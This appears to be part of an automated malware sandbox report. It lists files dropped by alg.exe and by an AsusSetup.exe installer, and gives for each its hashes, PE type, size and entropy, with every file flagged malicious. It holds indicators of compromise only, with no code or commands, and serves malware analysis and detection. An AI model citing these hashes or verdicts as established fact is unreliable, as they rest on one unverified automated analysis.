                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:drZ23AbsK6Ro022JjL2WEiVqJZX7wRGpj3:RJADmmxL2WEoCZLF9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F7C67DDF57251B55B2343B16C1B5F2BD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:12F65F178E4D5E1898E0A20DB3F46267AFD0334F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C47BA3993360F5035F833F72D9904430DAF7F95E347802B85A62AB7FFDA20BBD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B537487860B2BF7FC6FE8AC5D6FD2027C0550ABDC00B09D49D48146FCF7927B16F7B4D44C268C124FF8A33B9BB60ACB44914E0FDF9D55EDB6087EE20EC170C16
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.197655806987129
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5frYY42wd7hlOw9fpkEE64K/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kz9xrSKLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5B3299682BC5F894F39E10E4226252FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3D2046F1439C0389929858C913E37D48AD56FAB6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:63A8DFA6BF214D2AE0817EBA7C8EA9A9D3F3C63B0119784385CE8ED87E5DDBDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0AFED02815E8F0B597950D17AD1D78C634453FDAAC3AE814D45DC6B9C497BD29EE99B78D097D665B2B6D3BCC9832CAA31381C8BE7830EEF257D9472C106786CC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1544192
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.839823852855409
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3zNKUc5B/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3zNrc5BLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B4BBB721A38E9191AFB1C07206A2AEEB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:36BCE8AC0DDA7A939E2136F45DB8C613C5CA9AFA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5FB2ED1699C42FBAB008E698EA7F1F185E440EF3BDB12D85FA709B59BA26633F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A3BCF6195753F84EE61BAD27E062569506BD5CCCE71D981673B1500CF945EF8697C29D885D3B41A85F8C0A6D48383666B3AF261CFD5243A4E5C5B37787EE1998
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.572812014653155
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:XALuzDKnxCp3JKNrPJzruaI6HMaJTtGbI7wRGpj3:QaGg3cFPIaI6HMaJTtGbUF9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:736F3A1616794E6E711955FDF59C90E9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DFE5B333B2B00D245B0957D4B030BEF1E5D69AC9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F0C867326019B70917CA8972D6808328C629CDE9C71503BF821628E64F77D6FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB6EEED217C0D56FD24ED21DB8D61610B7454B1B5C274B9D23BC4457B1AC0E3B004BC0CA2F4948B89372AB5746623DE0486178E406E532B53C50244557779202
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1468416
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.895091251277158
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:SXr/SV0xWO/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KNxXLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:270F10D6077F5E360ADABACDEC49CE6C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DF2B418AB71EE0E9B2E8B8EE8DA7B1329754DF9D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1C285F7355FD502E35395A6B7B4719A6FC4AC3E66816BB3B32556B4F46FF04D4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8534FAA52D2CC1B281A29948C6C225EBC1CECF0A5D8D73D4B16C6B14BDB964C9A604147D5108463C5FA6D258501E7F4C423C1D7E336F98519B477C75B443339E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.248208731348386
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:4hRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOwF9:4hRCpGpMJMrbp8JjpNdNlc5r9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:502AB212888FBBE3955BE8FDA68091FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:297F50A2C2C99C8EB37D646129456E756A60E793
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CBB4A6D03794A2675B21D7C74C16A03C95446A6223B59E3D2AA699D7D1449736
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C37106AD03172635B39167CBC3C42619673CFCB7BE238C9F750E5646E8DF0393A7D1F6A040B23F7369204D0EE13087BA9D757576399C63A3AD5399901241616
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.784027951570186
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:U83pZ3kd0CuEeN0LUmRXzYs65msLNiXicJFFRGNzj3:YKuUQY15j7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D8718EE583C70B88B35ADFC2ADC54F92
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AE9CBA274315AC31526F3A6B6772985B0CBA178D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AF3E2DB2B888CA98CE3C5FCC5EB204548DA2C1E863C9A04C9120B75B9F1789FB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:53770E95F88593B75A1BF8633A7BCE56A20354931ABC55206C3E1CD094AB5578B62B580A0C44A777723B12C72CC561BE38E08D9C95D8F84CEF1E1FCF103D1ED5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.668992143913936
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:aErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mq:0A4oGlcR+glEdOPKzgVZu7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:639F2A1B0C95DB2D0EF8FC276BEB9ACA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DB85E2634F1885898F181C9E58F8405DAD9F8967
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:774A80FDB918020A298B20656C2101F4FD50C39646023AA6083A10BB203DCDEA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CF6A5C72792C8A471FEED8B3DA5F775F3DC3E6D86291BE3DDB571A0F3165B72B728D6BD156C2058338A61686E12C092A8E5AABE2B239794049D577C2BA417A1A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.828106381123198
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:58ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKh:Uv2gM+qwXLg7pPgw/DSZHc7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E02BE95F794F340E1AAA87B00C4203C0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CCA2A83D2CF587A143D453D6D7B35D0CDDD5C22A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:891A90C2AE7E6DB0F2ACAB90048B6C9FD0A38B89001EE5AC95387634C515CC43
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:02592E3AF2CB48A52AC2F67074890576C315CB9BB5C9C30746BE3F7AEB52960EBB6E360E7CDF97581852CBA032220642020CB60908F54E1EF32D177D7128F6A3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.828108896300621
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:u8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKh:Nv2gM+qwXLg7pPgw/DSZHc7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3144D6FAFF0803C85E4B41C99F27D715
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BB8D05422A0490A65A03BC0BE0AA2171F3883E17
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F3DA469AC839C126FA1EFA7196BCC720565C954D657167F2D7D135F11CF57746
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5D1DF606176BE4E475BEF00804BF40B5DBB4E85EA38AAC33B70564A499733DBFD2A4C8B49DA3E0F5E7D72D44D76D6D0FDC369389A6F17C769226A6C38EF8B12A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.949146993959025
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:AtjqL8fH+8aUbp8D/8+xyWAL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sjKK+81FI/8zdLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A67929D74E5EED4A75BA1338ACE743FE
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5C8DCEAAE12CAFBA4F783ED12FC90363EA203F98
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F5B0A2AFCDE5E7D31AA6DCFF95954D6057BA402116548AF18127E3F217F0AA46
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:92335B10E263FD5A8CADCAA37AF99858835E670DB0EE0031145CB14642B3DDBEF65A1E8499A050D71F2CEFD96076DDFB7AA44166400D61DCC696D3356FF965F9
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.0287692938953565
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:nAMsOu3JfCIGnZuTodRFYKBrFDbWpcLNiXicJFFRGNzj3:nAMa38ZuTSt7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3E0486920CCFA7AF38AC27EABFAA2D4C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E8A998E1BD21DE9CBC34E7D0C6995C42588CFC0C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B155C76DE2842E7F7A4389860AC515F41FF96228E7B170C8BE4F89A7E3BAE038
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:67FCE2D2554F7E8A9A89D90F1D7588E7ADF4F05068500C0100E68B7370FE9CE37EE698DAEDD0E5A6B0CB1725371629E9720B1FC15407F09261B35B1E2845EF46
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.099954677338449
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:gSK7Fhslq2EPfOGEaLNiXicJFFRGNzj3:po2cOa7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2A65F563F90552CFC1CEF18B3E1811C0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0BB55503D97D24FB784FD8734ECA804C516F72B0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:651C115E2EBC28B08ADCC8CD2163D449059D3674D4B729105B192EB092C3AD29
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E24408C4D442C05A22455D7C4B2A39019D1FB1FD706B8A7C573A0EE6E65626F9EBA2E1143CD4826625278AD668FC10E36F9AA3DD779AE4A3767EADE5E945113
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.153176060977831
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:Hv7e0j31mD+/wDGbQLNiXicJFFRGNzj3:PDj1mkQ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:187C330472AF33274B14D11E0FC2A673
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BA8CB51BA0C69E3BCCB0C5065DCCFEBADA10CDF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B683D78EF25A96CF50912A1DF737BF690E834B3F96CA517B2A069839836C10C5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9ADEDAE7E0367EC94982FEBB663C7DFE72159986B2D4A9F254F1E926FA5AF31035FF9549D4E130A22A715184C732E1ADC0AD555C4433832A30FCF1D510F2876A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1533952
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9367367180648545
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:i6hSs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:i+LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BB99677EE27AC21D6E788AED570327C8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3C945F9EDEFA85A4FA9F70C1A792EB53C3CBB0DB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:284842C9722262E097697971D8BDB19F1C98F71F5D40D1C19A09CF599F5C2734
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FCB0EAFACD33142A49712D9AE43238959E8FFC0B246A1DC37F295C31072441DA7A3FC0079210DAD1BE81AB2CC890DC61330DB68CCF4213FFBA6AC8F0F494AF9B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.216802506436986
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:asFfc1VyFn5UQn652bO4HP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:asFcIn5rJ5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:867007226049A2925F5093A5FF01EA22
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6A25565D3D9D4A6A93D9EB63FCAEA4C1B6D1D091
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AD9ED9B07CAC969093E41CE17F5C1E8C5422311F4877E4626C1FFCD4F4B563C5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D91F285498320AB0483C696EF4A5012C342CF102F5945389710584CC35F49F7EEE6B71EDC376ACA9CD0ED69D4071D323524981892093DD25B823DDF5CBAE9109
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.488103569558917
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:vt9o6p4xQbiKI69wpemIwpel94/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vt9faQbtl2peapeliLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9C30547B6B14FC4133767439AB607795
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3417A2FA1756008F6466100BE1353C82C8412CC0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B70411CAE2C04B8A84CBC6DADEFA1B6B683D373154FD6AB6B51CE0036FF036B9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB5057C19AA53913BAD1030DA04F71D3C6C98D0335E08FF63391C258249459FB50D1FFA51A2D3124C100A2EEE8D747839A4F11D870C1DC975CD8DD6B7552E022
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9015983625819315
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:RQVTZu0JX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SVTZuSLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C30B0904C7860F8C80AD284581CD7228
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:630FB9590F20F24152A95C0C41AC23CA378CA351
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C75CFDC7351744C072D46F3E665F6F4704B1CC6589BE1C2E2D67ABADE6F1A67E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0C901717E4E29AF8B28B6D8D2FD65DABC0C66FD5A2BA51F01AA2575541D3B03604C7A1950F392135B1DB7333281CC8DA407668C7D76BCF1E7521A9FB69D1580B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.801622507982826
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:EC1vpgXcZHzp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EC1vpIcNpLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:AEAF957F0BFB3313EDC15FC023BD113C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ED1409E2A7AE46F708C30A213996F4A4A600E0C6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3F966E97C8CDA6C7128425C96E7010627E9CC6029370D21077FECBA05ECFBADC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F1E348BEBC8E2BA82351EE20ABAFBD123F21F12D9FF959CD02E298754EFFFD3E379712DFEB9E6928A243819DC84FCF3618D8EC6A8D2B599FF005F632B559E508
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1355776
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65549499886843
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:TcF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B405DD4DEDB10961BF83ADC16A6864A3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CDB6CEF13CA9541A87F47BFC8CBB42D190F9B700
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4A8C0AE15E266BA488D37655F4F400F20466CE4E399E4E02EE7DEFD2094AD2B3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C4ACBA7E8593B00EE0E66CFBE0B301E72EA0C9E69F172D6F3B5AEA64B82079DD34648FF73A23E6186529719661159E227679A5CE6B2C847B03622F847417BB9E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1564160
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.005840216388587
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:YWLntIfGpn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TRIeBLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:AF1B5057C6BF376130797ADD94B4BE21
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9664706A328CFF92F4B87003D508F0E292005D1A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3EA31A6D92D4B2E972528478FDE4BAD9D425623772ECC2DF86D66D51BD2B685E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2BF116AC767D7872CB6A0127A0E392D1A43D7688BD3A7D12DF7F9971601A3C92CBE2C4BF1B742081BF849FCFFCD234CA346718693DC3DD4191857722A1F718AA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1340928
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.616050448505573
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:cIh9iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:dh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:616E2488479696337B4A3AEEFFFA36A4
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:62412333BCD0EB9E0EBFC695EED63B1790B4567D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B05600BB81CFC6C3A5F1F13CE1B6325875C67EAE81BACEA45FEDE9B2AF3F64E1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:306FEB348F894D5AA5EDF357B6DA4ABC223754883739D10C9F9E6E75BD5FA2AECD636510BC0D332CE052834A19E8872AFEFD46A634A9B9113AC066D01E2DB763
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1687552
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.018642594038045
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:N8oRcwt2ioQ3J+RI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:N8oRBoFILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3E708B9F749B64CE122B3F2AD3A41796
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3325BC2579CD9E8DA27DE1794A4CF5D495FB5ABB
